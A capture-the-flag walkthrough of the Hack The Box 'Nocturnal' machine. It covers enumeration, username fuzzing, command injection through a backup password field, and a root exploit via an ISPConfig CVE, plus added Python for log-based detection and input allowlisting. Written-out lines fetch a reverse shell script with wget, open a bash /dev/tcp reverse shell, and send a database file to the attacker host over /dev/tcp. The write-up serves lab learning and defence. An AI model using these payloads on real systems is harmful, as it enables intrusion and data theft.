HTB | Nocturnal

Machine - https://app.hackthebox.com/machines/Nocturnal

IP - 10.10.11.64

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.64 -Pn -oA nmap_ports                                         
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-14 23:36 IST
Nmap scan report for 10.10.11.64
Host is up (0.80s latency).
Not shown: 65482 filtered tcp ports (no-response), 51 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 104.95 seconds
└─$ nmap -sC -sV -p 22,80 10.10.11.64 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-14 23:42 IST
Nmap scan report for 10.10.11.64
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.00 seconds

Port 80

└─$ dirsearch -u http://nocturnal.htb/ -x 403,404

<--SNIP-->

Target: http://nocturnal.htb/

[23:52:55] Starting:
[23:54:03] 302 -    0B  - /admin.php  ->  login.php
[23:54:39] 301 -  178B  - /backups  ->  http://nocturnal.htb/backups/
[23:54:58] 302 -    0B  - /dashboard.php  ->  login.php
[23:55:38] 200 -  644B  - /login.php
[23:55:40] 302 -    0B  - /logout.php  ->  login.php
[23:56:21] 200 -  649B  - /register.php
[23:57:01] 302 -    3KB - /view.php  ->  login.php

Task Completed

Let’s create an account and look further into the website.

Foothold/shell

After creating an account (test:test) we were redirected to the dashboard, which offers a file upload function.

Trying to upload a text file gives the error “Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.”

We were able to upload a test.pdf file. We had already seen the /view.php endpoint in the dirsearch output.

Let’s visit that endpoint. It looks like we will need to modify the URL.

On the upload page we found the link to our file: http://nocturnal.htb/view.php?username=test&file=test.pdf

fuzzing username

Since the username is taken straight from the URL (the page serves files for whichever username is supplied, not just the logged-in one), we can enumerate users here.


└─$ ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf' -H 'Cookie: PHPSESSID=cp1p13o4js9gtnbv448l899c1g' -w /usr/share/seclists/Usernames/Names/names.txt -fs 2985

We found three users: admin, amanda and tobias.

The responses for these users differ from the generic one (which is what the -fs 2985 filter above keys on). When checking amanda’s files, we found privacy.odt.
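From the defender’s side, the sweep above leaves a clear footprint in the nginx access log: one client requesting /view.php with many different username values, most of them returning the same-sized page. The following is an added example, not part of the original writeup, that parses constructed combined-format log lines (the 3710-byte size and the 10.10.16.20 client are made up) and flags that pattern.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# nginx "combined" access-log line; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Return a dict with ip, script path, query dict and response size, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["path"])
    rec["script"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec

def find_enumeration(lines, threshold=5):
    """Flag clients that requested /view.php with more than `threshold` distinct
    username= values, and list the names whose response size differed from that
    client's most common size (the same signal the -fs filter above keys on)."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["script"] == "/view.php" and "username" in rec["query"]:
            per_ip[rec["ip"]].append((rec["query"]["username"], rec["size"]))
    report = {}
    for ip, hits in per_ip.items():
        names = {name for name, _ in hits}
        if len(names) <= threshold:
            continue
        common_size = Counter(size for _, size in hits).most_common(1)[0][0]
        report[ip] = {
            "distinct_usernames": len(names),
            "deviating": sorted({n for n, s in hits if s != common_size}),
        }
    return report

# Constructed sample log (not captured from the box): one client sweeping a
# wordlist, one ordinary user opening their own file. 3710 is a made-up size.
def _line(ip, name, size):
    return (f'{ip} - - [14/May/2025:23:58:01 +0530] '
            f'"GET /view.php?username={name}&file=test.pdf HTTP/1.1" 200 {size} "-" "-"')
SAMPLE_LOG = [_line("10.10.16.7", n, 2985) for n in ["aaron", "abby", "abigail", "alan", "alex"]]
SAMPLE_LOG += [_line("10.10.16.7", n, 3710) for n in ["admin", "amanda", "tobias"]]
SAMPLE_LOG += [_line("10.10.16.20", "test", 3710)] * 2
```

Running find_enumeration(SAMPLE_LOG) flags only 10.10.16.7, with admin, amanda and tobias listed as the guesses that got a different page back.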

privacy.odt

It is an OpenDocument text file.

Let’s open it and analyze the content.

Found amanda’s password.

admin panel

We can log in as amanda

and visit the admin panel.

Intercepting the create-backup request, we can see the password and backup parameters.

To get a command executed, use %0a for line breaks and %09 for spaces.

Trying bash commands in the password parameter, we were able to execute the id command:

password=bash%09-c%09"id"%0A&backup=
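The %09/%0A trick works against filters that strip the usual separators but forget that tab is whitespace and newline is a command separator to bash. As an added illustration (not code from the box, whose backup handler is not shown here), this Python model checks the payload above against such a denylist, then shows the two controls the handler should have instead: an allowlist on the password and an argv list with no shell. The zip -P command and the 8-64 character policy are assumptions.

```python
import re
from urllib.parse import unquote

# The password value from the writeup's POST body, exactly as sent (URL-encoded).
PAGE_PAYLOAD = 'bash%09-c%09"id"%0A'

# A denylist of the "usual" shell separators. Filters like this are what the
# %09/%0A trick defeats: tab and newline are whitespace and a command separator
# to bash, but neither is on the list.
DENYLIST = [";", "&", "|", "$", "`", " ", "(", ")", "{", "}"]

def denylist_accepts(password: str) -> bool:
    """True if a denylist-based filter would pass the value on to a shell."""
    return not any(bad in password for bad in DENYLIST)

# Allowlist: a backup password is opaque to the application, so a strict
# character class plus length bounds is reasonable. (Policy chosen for this
# example; the box's actual rule is unknown.)
ALLOWLIST_RE = re.compile(r"[A-Za-z0-9._-]{8,64}")

def allowlist_accepts(password: str) -> bool:
    """True only for printable, non-whitespace, non-metacharacter passwords."""
    return ALLOWLIST_RE.fullmatch(password) is not None

def build_backup_argv(password: str, archive: str, source_dir: str) -> list:
    """Return the zip command as an argv list. Run it with
    subprocess.run(argv, shell=False): with no shell parsing the line, the
    password is one literal argument whatever bytes it contains, so the
    allowlist is defence in depth rather than the only barrier."""
    if not allowlist_accepts(password):
        raise ValueError("backup password contains characters outside the allowlist")
    return ["zip", "-r", "-P", password, archive, source_dir]

def decoded_payload() -> str:
    """The page's payload after URL decoding: tabs for %09, a newline for %0A."""
    return unquote(PAGE_PAYLOAD)
```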

shell as www-data

When trying to execute a reverse shell directly, I was getting errors,

so I uploaded the reverse shell script to the box and ran it:

└─$ cat shell
bash -i >& /dev/tcp/10.10.16.7/1234 0>&1
password=%0Abash%09-c%09"wget%0910.10.16.7/shell"%0A&backup=
password=%0Abash%09-c%09"bash%09shell"%0A&backup=

shell as tobias

nocturnal_database.db

We found a database file:

www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db

Let’s copy it to our machine:

//on box
www-data@nocturnal:~/nocturnal_database$ cat nocturnal_database.db > /dev/tcp/10.10.16.7/4444
<at nocturnal_database.db > /dev/tcp/10.10.16.7/4444
www-data@nocturnal:~/nocturnal_database$ 

//on kali
└─$ nc -nlvp 4444 > nocturnal_database.db
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.64] 41470
                                                                                                                                                                                                                                            
┌──(anurag㉿anurag)-[~/htb/Nocturnal]
└─$ file nocturnal_database.db
nocturnal_database.db: SQLite 3.x database, last written using SQLite version 3031001, file counter 19, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 19

There is a users table in the database, from which we get the hashed passwords.

Found tobias’s password.

We are in as tobias, and we also found user.txt.

Privilege Escalation

port 8080

Something is hosted internally on port 8080.

Let’s start a new SSH session with local port forwarding:

└─$ ssh tobias@10.10.11.64 -L 9090:127.0.0.1:8080

Let’s log in as admin with tobias’s password.

Found the version.

CVE-2023-46818

Googling for an exploit for ISPConfig 3.2, we found CVE-2023-46818 and this exploit.

And we are in as root.

Found root.txt.
